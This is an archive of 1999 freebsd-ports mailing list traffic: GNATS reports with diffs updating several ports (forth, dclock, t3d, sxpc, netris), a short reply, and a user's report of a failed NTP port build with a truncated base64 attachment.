version_type=freebsd-$objformat - library_names_spec='$libname.so.$versuffix $libname.so' -- finish_cmds='PATH="\$PATH:/sbin" ldconfig -m $libdir' -+ finish_cmds="PATH=\"\$PATH:/sbin\" OBJFORMAT=$objformat ldconfig -m \$libdir" - shlibpath_var=LD_LIBRARY_PATH - ;; - diff -urN /usr/ports/lang/cim/patches/patch-ab lang/cim/patches/patch-ab --- /usr/ports/lang/cim/patches/patch-ab Mon Mar 15 10:23:01 1999 +++ lang/cim/patches/patch-ab Thu Jan 1 09:00:00 1970 @@ -1,21 +0,0 @@ ---- ltmain.sh.orig Tue Mar 9 20:09:38 1999 -+++ ltmain.sh Tue Mar 9 20:10:53 1999 -@@ -710,6 +710,18 @@ - versuffix="$current.$revision" - ;; - -+ freebsd-aout) -+ version_vars="$version_vars major versuffix" -+ major="$current" -+ versuffix="$current.$revision"; -+ ;; -+ -+ freebsd-elf) -+ version_vars="$version_vars major versuffix" -+ major="$current" -+ versuffix="$current"; -+ ;; -+ - *) - echo "$progname: unknown library version type \`$version_type'" 1>&2 - echo "Fatal configuration error. See the $PACKAGE docs for more information." 1>&2 diff -urN /usr/ports/lang/cim/pkg/PLIST lang/cim/pkg/PLIST --- /usr/ports/lang/cim/pkg/PLIST Sun Jun 6 07:42:11 1999 +++ lang/cim/pkg/PLIST Sun Dec 19 17:10:17 1999 @@ -5,7 +5,6 @@ include/cim.h lib/libcim-atr.a lib/libcim.a -lib/libcim.la lib/libcim.so lib/libcim.so.3 @exec /usr/bin/env OBJFORMAT=%%PORTOBJFORMAT%% /sbin/ldconfig -m %B >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 20 9:10: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0E6B015313 for ; Mon, 20 Dec 1999 09:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA34813; Mon, 20 Dec 1999 09:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id E2C7215347; Mon, 20 Dec 1999 09:00:12 -0800 (PST) Message-Id: <19991220170012.E2C7215347@hub.freebsd.org> Date: Mon, 20 Dec 1999 09:00:12 -0800 (PST) From: tkato@prontomail.ne.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15584: Update port: lang/forth Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15584 >Category: ports >Synopsis: Update port: lang/forth >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Dec 20 09:10:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: KATO Tsuguru >Release: 3.3-RELEASE i386 >Organization: >Environment: >Description: * Rearranged configure target Remove file: scripts/configure >How-To-Repeat: >Fix: diff -urN /usr/ports/lang/forth/Makefile lang/forth/Makefile --- /usr/ports/lang/forth/Makefile Mon Oct 11 19:16:05 1999 +++ lang/forth/Makefile Sun Dec 19 18:12:13 1999 @@ -13,10 +13,10 @@ MAINTAINER= ports@FreeBSD.org WRKSRC= ${WRKDIR}/${DISTNAME}/src +HAS_CONFIGURE= yes +CONFIGURE_SCRIPT= config.sh +CONFIGURE_ARGS= ${OPSYS} MAN1= pfe.1 - -do-configure: - (cd ${WRKSRC}; ${SH} ./config.sh FreeBSD) post-install: ${INSTALL_PROGRAM} ${WRKSRC}/pfe ${PREFIX}/bin diff -urN /usr/ports/lang/forth/scripts/configure lang/forth/scripts/configure --- /usr/ports/lang/forth/scripts/configure Wed Nov 23 16:23:24 1994 +++ lang/forth/scripts/configure Thu Jan 1 09:00:00 1970 @@ -1,16 +0,0 @@ -#!/bin/sh - -PREFIX=${PREFIX:-/usr/local} - -F=$WRKSRC/Makefile - - -echo "PREFIX= $PREFIX" > $F || exit 1; -echo "all:" >> $F -echo " cd $WRKSRC/src; make all" >> $F -echo "install: x" >> $F -echo "" >> $F -echo "x:" >> $F -echo " cd $WRKSRC/src; make install" >> $F -(cd $WRKSRC/src; ./config --prefix=$PREFIX) -cp $FILESDIR/makefile $WRKSRC/src/makefile >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 20 9:10:10 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0231F1532A for ; Mon, 20 Dec 1999 09:10:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA34822; Mon, 20 Dec 1999 09:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id D33141536D; Mon, 20 Dec 1999 09:01:26 -0800 (PST) Message-Id: <19991220170126.D33141536D@hub.freebsd.org> Date: Mon, 20 Dec 1999 09:01:26 -0800 (PST) From: tkato@prontomail.ne.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15585: Update port: x11-clocks/bclock Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15585 >Category: ports >Synopsis: Update port: x11-clocks/bclock >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Dec 20 09:10:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: KATO Tsuguru >Release: 3.3-RELEASE i386 >Organization: >Environment: >Description: * Fixed typo >How-To-Repeat: >Fix: diff -urN /usr/ports/x11-clocks/bclock/Makefile x11-clocks/bclock/Makefile --- /usr/ports/x11-clocks/bclock/Makefile Tue Aug 31 19:19:09 1999 +++ x11-clocks/bclock/Makefile Sun Dec 19 14:08:50 1999 @@ -1,4 +1,4 @@ -# New ports collection makefile for: dclock +# New ports collection makefile for: bclock # Version required: 1.0 # Date created: 13 May 1997 # Whom: Brian Handy >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 20 9:10:21 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 33CFE15330 for ; Mon, 20 Dec 1999 09:10:05 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA34844; Mon, 20 Dec 1999 09:10:05 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id B92E614CE7; Mon, 20 Dec 1999 09:03:39 -0800 (PST) Message-Id: <19991220170339.B92E614CE7@hub.freebsd.org> Date: Mon, 20 Dec 1999 09:03:39 -0800 (PST) From: tkato@prontomail.ne.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15587: Update port: x11-clocks/t3d Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15587 >Category: ports >Synopsis: Update port: x11-clocks/t3d >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Dec 20 09:10:04 PST 1999 >Closed-Date: >Last-Modified: >Originator: KATO Tsuguru >Release: 3.3-RELEASE i386 >Organization: >Environment: >Description: * freebsd.org -> FreeBSD.org * zcat -> GZIP_CMD * sh -> SH * Added WWW: line into pkg/DESCR >How-To-Repeat: >Fix: diff -urN /usr/ports/x11-clocks/t3d/Makefile x11-clocks/t3d/Makefile --- /usr/ports/x11-clocks/t3d/Makefile Tue Aug 31 19:19:12 1999 +++ x11-clocks/t3d/Makefile Mon Dec 20 19:13:40 1999 @@ -1,25 +1,24 @@ -# New ports collection makefile for: t3d -# Version required: 1.1 -# Date created: 20 Apr 1998 -# Whom: J Han +# New ports collection makefile for: t3d +# Version required: 1.1 +# Date created: 20 Apr 1998 +# Whom: J Han # # $FreeBSD: ports/x11-clocks/t3d/Makefile,v 1.5 1999/08/31 02:58:02 peter Exp $ # -DISTNAME= t3d +DISTNAME= t3d PKGNAME= t3d-1.1 CATEGORIES= x11-clocks MASTER_SITES= http://www.jwdt.com/~paysan/ EXTRACT_SUFX= .shar.gz -MAINTAINER= ports@freebsd.org +MAINTAINER= ports@FreeBSD.org -EXTRACT_CMD= zcat -EXTRACT_BEFORE_ARGS= -EXTRACT_AFTER_ARGS= |sh +EXTRACT_CMD= ${GZIP_CMD} +EXTRACT_BEFORE_ARGS= -dc +EXTRACT_AFTER_ARGS= | ${SH} NO_WRKSUBDIR= yes - USE_IMAKE= yes .include diff -urN /usr/ports/x11-clocks/t3d/pkg/DESCR x11-clocks/t3d/pkg/DESCR --- /usr/ports/x11-clocks/t3d/pkg/DESCR Fri Apr 24 14:36:24 1998 +++ x11-clocks/t3d/pkg/DESCR Sun Dec 19 16:19:15 1999 @@ -3,3 +3,5 @@ graphic workstation with its many XStones is doing something. -- t3d source is under GPL but not its appearance -- read the manual for details. + +WWW: http://www.jwdt.com/~paysan/#T3D >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 20 9:10:24 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id BB6BB15337 for ; Mon, 20 Dec 1999 09:10:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA34835; Mon, 20 Dec 1999 09:10:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 1E95E15315; Mon, 20 Dec 1999 09:02:24 -0800 (PST) Message-Id: <19991220170224.1E95E15315@hub.freebsd.org> Date: Mon, 20 Dec 1999 09:02:24 -0800 (PST) From: tkato@prontomail.ne.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15586: Update port: x11-clocks/dclock to pl6 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15586 >Category: ports >Synopsis: Update port: x11-clocks/dclock to pl6 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Dec 20 09:10:04 PST 1999 >Closed-Date: >Last-Modified: >Originator: KATO Tsuguru >Release: 3.3-RELEASE i386 >Organization: >Environment: >Description: * Updated version pl4 to pl6 Note: ports/11879 should be superseded by this PR. New file: patches/patch-ab patches/patch-ac Remove file: patches/patch-aa >How-To-Repeat: >Fix: diff -urN /usr/ports/x11-clocks/dclock/Makefile x11-clocks/dclock/Makefile --- /usr/ports/x11-clocks/dclock/Makefile Tue Aug 31 19:19:09 1999 +++ x11-clocks/dclock/Makefile Sun Dec 19 15:52:10 1999 @@ -1,27 +1,25 @@ # New ports collection makefile for: dclock -# Version required: pl4 +# Version required: pl6 # Date created: 15 Aug 1996 # Whom: David Leonard # # $FreeBSD: ports/x11-clocks/dclock/Makefile,v 1.9 1999/08/31 06:52:30 mharo Exp $ # -DISTNAME= dclock -PKGNAME= dclock-pl4 +DISTNAME= Dclock +PKGNAME= dclock-pl6 CATEGORIES= x11-clocks -MASTER_SITES= ftp://ftp.x.org/R5contrib/ -EXTRACT_SUFX= .shar.Z +MASTER_SITES= ftp://ftp.demon.co.uk/pub/graphics/systems/X11.old/pub/R6untarred/contrib/programs/ + +PATCH_SITES= ${MASTER_SITE_XCONTRIB} +PATCH_SITE_SUBDIR= R6contrib-fixes +PATCHFILES= Dclock-pl6.patch.gz +PATCH_DIST_STRIP= -p1 MAINTAINER= ports@FreeBSD.org -USE_XLIB= yes +IGNOREFILES= ${DISTFILES} +USE_IMAKE= yes MAN1= dclock.1 -MANCOMPRESSED= yes - -EXTRACT_CMD= ${GZIP_CMD} -EXTRACT_BEFORE_ARGS= -dc -EXTRACT_AFTER_ARGS= |sh - -NO_WRKSUBDIR= yes -ALL_TARGET= dclock .include diff -urN /usr/ports/x11-clocks/dclock/files/md5 x11-clocks/dclock/files/md5 --- /usr/ports/x11-clocks/dclock/files/md5 Mon May 4 02:54:47 1998 +++ x11-clocks/dclock/files/md5 Sun Dec 19 15:53:51 1999 @@ -1 +1,2 @@ -MD5 (dclock.shar.Z) = c02279a04e7ca617b327bc4963920593 +MD5 (Dclock-pl6.patch.gz) = 539204f67d1662c5ed738f8b8e9d9bf2 +MD5 (Dclock.tar.gz) = IGNORE diff -urN /usr/ports/x11-clocks/dclock/patches/patch-aa x11-clocks/dclock/patches/patch-aa --- /usr/ports/x11-clocks/dclock/patches/patch-aa Mon Sep 21 19:53:27 1998 +++ x11-clocks/dclock/patches/patch-aa Thu Jan 1 09:00:00 1970 @@ -1,29 +0,0 @@ ---- Makefile.orig Sun Sep 20 19:59:13 1998 -+++ Makefile Sun Sep 20 20:03:13 1998 -@@ -3,12 +3,14 @@ - OBJS= Dclock.o dclock.o - HFILES= Dclock.h DclockP.h patchlevel.h - --CFLAGS= -O --LDFLAGS= --LIBS= -lXt -lX11 -+CFLAGS+= -I${X11BASE}/include -+.if ${PORTOBJFORMAT} == "elf" -+LDFLAGS+=-Wl,-rpath,${X11BASE}/lib -+.endif -+LIBS= -L${X11BASE}/lib -lXt -lX11 - - dclock: ${OBJS} -- cc ${LDFLAGS} ${OBJS} ${LIBS} -o dclock -+ cc -o dclock ${OBJS} ${LIBS} ${LDFLAGS} - - clean: ; rm -f ${OBJS} core dclock - -@@ -16,3 +18,7 @@ - - tar: ; tar fcv - README Makefile dclock.man ${HFILES} ${SRCS} | \ - compress > dclock.tar.Z -+ -+install: -+ install -cs dclock ${PREFIX}/bin -+ gzip -9c < dclock.man > ${PREFIX}/man/man1/dclock.1.gz diff -urN /usr/ports/x11-clocks/dclock/patches/patch-ab x11-clocks/dclock/patches/patch-ab --- /usr/ports/x11-clocks/dclock/patches/patch-ab Thu Jan 1 09:00:00 1970 +++ x11-clocks/dclock/patches/patch-ab Sun Dec 19 15:59:30 1999 @@ -0,0 +1,11 @@ +--- Dclock.h.orig Mon Jun 6 08:00:00 1994 ++++ Dclock.h Sun Dec 19 15:59:17 1999 +@@ -58,7 +58,7 @@ + #define XtNfadeRate "fadeRate" + #define XtNtails "tails" + #define XtNdate "date" +-#define XtNmilitaryTime "militaryTime" ++#define XtNmilitaryTime "miltime" + #define XtNlanguage "language" + #define XtNhours_snd "hours_snd" + #define XtNhalf_hours_snd "half_hours_snd" diff -urN /usr/ports/x11-clocks/dclock/patches/patch-ac x11-clocks/dclock/patches/patch-ac --- /usr/ports/x11-clocks/dclock/patches/patch-ac Thu Jan 1 09:00:00 1970 +++ x11-clocks/dclock/patches/patch-ac Sun Dec 19 16:01:45 1999 @@ -0,0 +1,11 @@ +--- d_clock.c.orig Fri Jun 3 08:00:00 1994 ++++ d_clock.c Sun Dec 19 16:01:36 1999 +@@ -131,7 +131,7 @@ + else + name = argv[0]; + +- toplevel = XtInitialize(name, "DClock", options, XtNumber(options), ++ toplevel = XtInitialize(name, "Dclock", options, XtNumber(options), + &argc, argv); + XtAddActions(actionsList, 1); + >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 20 9:10:27 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E142015340 for ; Mon, 20 Dec 1999 09:10:05 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA34855; Mon, 20 Dec 1999 09:10:05 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id ADA9815313; Mon, 20 Dec 1999 09:05:38 -0800 (PST) Message-Id: <19991220170538.ADA9815313@hub.freebsd.org> Date: Mon, 20 Dec 1999 09:05:38 -0800 (PST) From: tkato@prontomail.ne.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15588: Update port: x11/sxpc Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15588 >Category: ports >Synopsis: Update port: x11/sxpc >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Dec 20 09:10:05 PST 1999 >Closed-Date: >Last-Modified: >Originator: KATO Tsuguru >Release: 3.3-RELEASE i386 >Organization: >Environment: >Description: * Fixed MASTER_SITES * Added MAINTAINER line * zcat -> GZIP_CMD * sh -> SH Note: This PR supersedes ports/15537. >How-To-Repeat: >Fix: diff -urN /usr/ports/x11/sxpc/Makefile x11/sxpc/Makefile --- /usr/ports/x11/sxpc/Makefile Tue Aug 31 19:19:02 1999 +++ x11/sxpc/Makefile Mon Dec 20 19:13:10 1999 @@ -1,4 +1,4 @@ -# New ports collection Makefile for: sxpc +# New ports collection Makefile for: sxpc # Version required: 1.4 # Date created: 22nd March 1995 # Whom: jkh@FreeBSD.org @@ -8,13 +8,17 @@ DISTNAME= sxpc-1.4 CATEGORIES= x11 -MASTER_SITES= ftp://ftp.x.org/R5contrib/ +MASTER_SITES= ${MASTER_SITE_XCONTRIB} +MASTER_SITE_SUBDIR= utilities EXTRACT_SUFX= .shar.Z +MAINTAINER= ports@FreeBSD.org + +EXTRACT_CMD= ${GZIP_CMD} +EXTRACT_BEFORE_ARGS= -dc +EXTRACT_AFTER_ARGS= | ${SH} + NO_WRKSUBDIR= yes -EXTRACT_CMD= zcat -EXTRACT_BEFORE_ARGS= -EXTRACT_AFTER_ARGS= |sh USE_IMAKE= yes MAN1= sxpc.1 >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 20 9:20:11 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id DC80F152EF for ; Mon, 20 Dec 1999 09:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA36035; Mon, 20 Dec 1999 09:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from cichlids.com (as12-027.rp-plus.de [149.221.242.27]) by hub.freebsd.org (Postfix) with ESMTP id 1C9FC14CE7 for ; Mon, 20 Dec 1999 09:13:32 -0800 (PST) (envelope-from alex@cichlids.com) Received: from cichlids.cichlids.com (cichlids.cichlids.com [192.168.0.10]) by cichlids.com (Postfix) with ESMTP id 2E8BEAB7F for ; Mon, 20 Dec 1999 18:13:31 +0100 (CET) Received: (from root@localhost) by cichlids.cichlids.com (8.9.3/8.9.3) id SAA04241; Mon, 20 Dec 1999 18:14:19 +0100 (CET) (envelope-from alex) Message-Id: <199912201714.SAA04241@cichlids.cichlids.com> Date: Mon, 20 Dec 1999 18:14:19 +0100 (CET) From: alex@big.endian.de To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15589: update games/netris to 0.5 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15589 >Category: ports >Synopsis: update games/netris to 0.5 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Dec 20 09:20:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Alexander Langer >Release: FreeBSD 4.0-CURRENT i386 >Organization: nope >Environment: checked on -current >Description: * update to version 0.5 (just distfile, patches are ok) >How-To-Repeat: >Fix: diff -ru netris.old/Makefile netris/Makefile --- netris.old/Makefile Mon Dec 20 18:05:37 1999 +++ netris/Makefile Mon Dec 20 18:06:46 1999 @@ -1,12 +1,12 @@ # New ports collection makefile for: netris -# Version required: 0.4 +# Version required: 0.5 # Date created: 1 August 1996 # Whom: desmo # # $FreeBSD: ports/games/netris/Makefile,v 1.2 1999/08/25 06:04:08 obrien Exp $ # -DISTNAME= netris-0.4 +DISTNAME= netris-0.5 CATEGORIES= games MASTER_SITES= ftp://ftp.netris.org/pub/netris/ diff -ru netris.old/files/md5 netris/files/md5 --- netris.old/files/md5 Mon Dec 20 18:05:36 1999 +++ netris/files/md5 Mon Dec 20 18:07:19 1999 @@ -1 +1 @@ -MD5 (netris-0.4.tar.gz) = 6c0896633bf20c9fa902956ef79c183f +MD5 (netris-0.5.tar.gz) = a30c950fd4e4779a26f856bc7cd1aaff >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 20 9:30:11 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4D38415377 for ; Mon, 20 Dec 1999 09:30:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA36891; Mon, 20 Dec 1999 09:30:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Mon, 20 Dec 1999 09:30:03 -0800 (PST) Message-Id: <199912201730.JAA36891@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: Alexander Langer Subject: Re: ports/15587: Update port: x11-clocks/t3d Reply-To: Alexander Langer Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15587; it has been noted by GNATS. From: Alexander Langer To: tkato@prontomail.ne.jp Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: ports/15587: Update port: x11-clocks/t3d Date: Mon, 20 Dec 1999 18:24:49 +0100 Thus spake tkato@prontomail.ne.jp (tkato@prontomail.ne.jp): > -MAINTAINER= ports@freebsd.org > +MAINTAINER= ports@FreeBSD.org Don't _you_ want to become maintainer? Alex -- I doubt, therefore I might be. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 20 9:48: 1 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 36B6F14C97; Mon, 20 Dec 1999 09:47:58 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA38767; Mon, 20 Dec 1999 09:47:58 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Mon, 20 Dec 1999 09:47:58 -0800 (PST) From: Message-Id: <199912201747.JAA38767@freefall.freebsd.org> To: phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: misc/12013: patch for 12012 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: patch for 12012 Responsible-Changed-From-To: freebsd-bugs->freebsd-ports Responsible-Changed-By: phantom Responsible-Changed-When: Mon Dec 20 09:47:10 PST 1999 Responsible-Changed-Why: Misfiled PR To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 20 9:48: 3 1999 Delivered-To: freebsd-ports@freebsd.org Received: from c012.sfo.cp.net (c012-h007.c012.sfo.cp.net [209.228.13.98]) by hub.freebsd.org (Postfix) with SMTP id 9994615222 for ; Mon, 20 Dec 1999 09:47:52 -0800 (PST) (envelope-from strben@altavista.com) Received: (cpmta 18416 invoked from network); 20 Dec 1999 09:47:52 -0800 Date: 20 Dec 1999 09:47:52 -0800 Message-ID: <19991220174752.18415.cpmta@c012.sfo.cp.net> X-Sent: 20 Dec 1999 17:47:52 GMT Received: from [192.251.173.33] by mail.altavista.com with HTTP; 20 Dec 1999 09:47:52 PST Content-Type: multipart/mixed; boundary="----------=_945712072-17629-0" Mime-Version: 1.0 To: ports@freebsd.org From: strben@altavista.com X-Mailer: Web Mail 3.3 Subject: Problems installing the NTP port. Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format... ------------=_945712072-17629-0 Content-Type: text/plain Content-Disposition: inline Hello all I am not currently subscribed to: ports@FreeBSD.ORG so please reply directly if you are reading this on that list. I attempted to install the port for: "/usr/ports/net/NTP" but the software failed to compile properly. I ran CVSUP and updated my system and ports to the level listed below but still failed to install the port. Please advise me on the next suggested step... Thanks!!! Any help will be greatly appreciated ! $ uname -a FreeBSD mpgate1.help.please.com 3.4-STABLE FreeBSD 3.4-STABLE #0: Sat Dec 18 03:31:28 EST 1999 bhacker1@mpgate1.help.please.com:/usr/src/sys/compile/MPGATE1-3 i386 $ $ $ cat error34.txt===> Extracting for ntp-4.0.93a >> Checksum OK for ntp-4.0.93a.tar.gz. ===> ntp-4.0.93a depends on executable: autoconf - found ===> Patching for ntp-4.0.93a ===> Applying FreeBSD patches for ntp-4.0.93a ===> Configuring for ntp-4.0.93a creating cache ./config.cache -=-=-=- -=-=-=- See attached *.zip/gz -=-=-=- -=-=-=- cc -DHAVE_CONFIG_H -I. -I. -I.. -I../include -O -pipe -Wall -Wshadow -Wwrite-strings -Wconversion -Wpointer-arith -Wcast-qual -Wstrict-prototypes -pipe -c ntp_proto.c cc -DHAVE_CONFIG_H -I. -I. -I.. -I../include -O -pipe -Wall -Wshadow -Wwrite-strings -Wconversion -Wpointer-arith -Wcast-qual -Wstrict-prototypes -pipe -c ntp_refclock.c *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. $ -=*=- -=*=- -=*=- -=*=- -=*=- -=*=- -=*=- -=*=- -=*=- Ben Hacker Jr Technical Specialist Computer Sciences Corporation (703) 289-3477 MC 291 bhacker1@csc.com 3170 Fairview Park Drive strben@altavista.net Falls Church, VA 22304 -=*=- -=*=- -=*=- -=*=- -=*=- -=*=- -=*=- -=*=- -=*=- ______________________________________________________________ Open your mind. Close your wallet. Free Internet Access from AltaVista. http://www.altavista.com ------------=_945712072-17629-0 Content-Type: application/zip; name="NTP-err3.zip" Content-Disposition: attachment; filename="NTP-err3.zip" Content-Transfer-Encoding: base64 UEsDBBQAAAAIACJVlCd1hDHAZRAAAB9iAAAMAAAATlRQLWVycjMudHh01Vxf b9s4En8PkO9A4BZouzjb+bvNFtjFJY6T+NrERuS2u/di0BRt8yKJWpJy4j3c d78ZSrJli7SzDwdEBZI6mhlyODMc/mbE5AeSJTTmpEUPD24U51fBNYnTGTX8 uD3nUdpOI041bzMZk9P2WSsYXV596ZGStfLob0efyOFBQA255owcX5Cj00+n x59OLkgvGJHjn3/+meC/w4PJnLInro7/4ZnnUyfTqqMV6+il7sCDVES8cz+8 vRz1jlunhIjTi58OD34g5ReDOblSUp2etc2L+eWXX34lpPdiFGVGJDMylYok Jm2dtY/aP5/CQn/9lXTnnD3pLCaDz9v0tqGqPfuzfXiQj1SlkZCnPAk1kQnh L5xlhk4i/onQzEgmkylpwWhZEpayQ2rY3KlDTr9M02iJ9NKgKQpw7ePvwhxi linnkExxahfMKIxB2h1mudv2RyDjkpE8l9oQsK3hMTHLlLfbbWvTVmsKWkx0 CF6tsIM5ZvyvCEwyEYV/gR8XQgmuHp0NSwCTEpFoQ6MIRW08TETSKZ6RFiMt SZSUhrRm5HnOeVQZDn42c64KNXiyEEomMU8MEZpomlh1llw7RGL6xInmRpMf /nN/+bn33zorKvsslf1MWSQZtTrGQmt45GMswgM5i/jw8qEOrxtxzmnI1b4x cTyRTKWPb5ZkGPBATeQ2yUconsN/2xKMIYExh3HhG+mSYj8r8p6BFweklYqU kw9WXe33zG5hcCwlTEmtWyVLTe9ypGdOqOIkQ+OS24evpOufFWahjPEUAqI1 q7PN5TMxEIhZUuiXKp4qybjWUuV2IK3eloli+vzktraPkPgIxXP477Wx/N7m gvCDf725Sfd4I0pIS+9jgsESziFXtiATh8IImeR7pbaOy/5vzuexSMRLmcXm TpbhIOj/Jv7kIekHXSeHokkkJkjKP22RtR3Xphc9//8lJevHSEDiFWC7iEdT 94opkC3H0yJ2J5/KKFHojpc1R+xhgYSOp8BkScNQ5ayJdjtnrVIqtXg5czJp CUd6MWf+2e3oh6AP2yRPXGQK+9QRP8g40QbPOI/T4bBPZE6ri05ZYiIfMeax 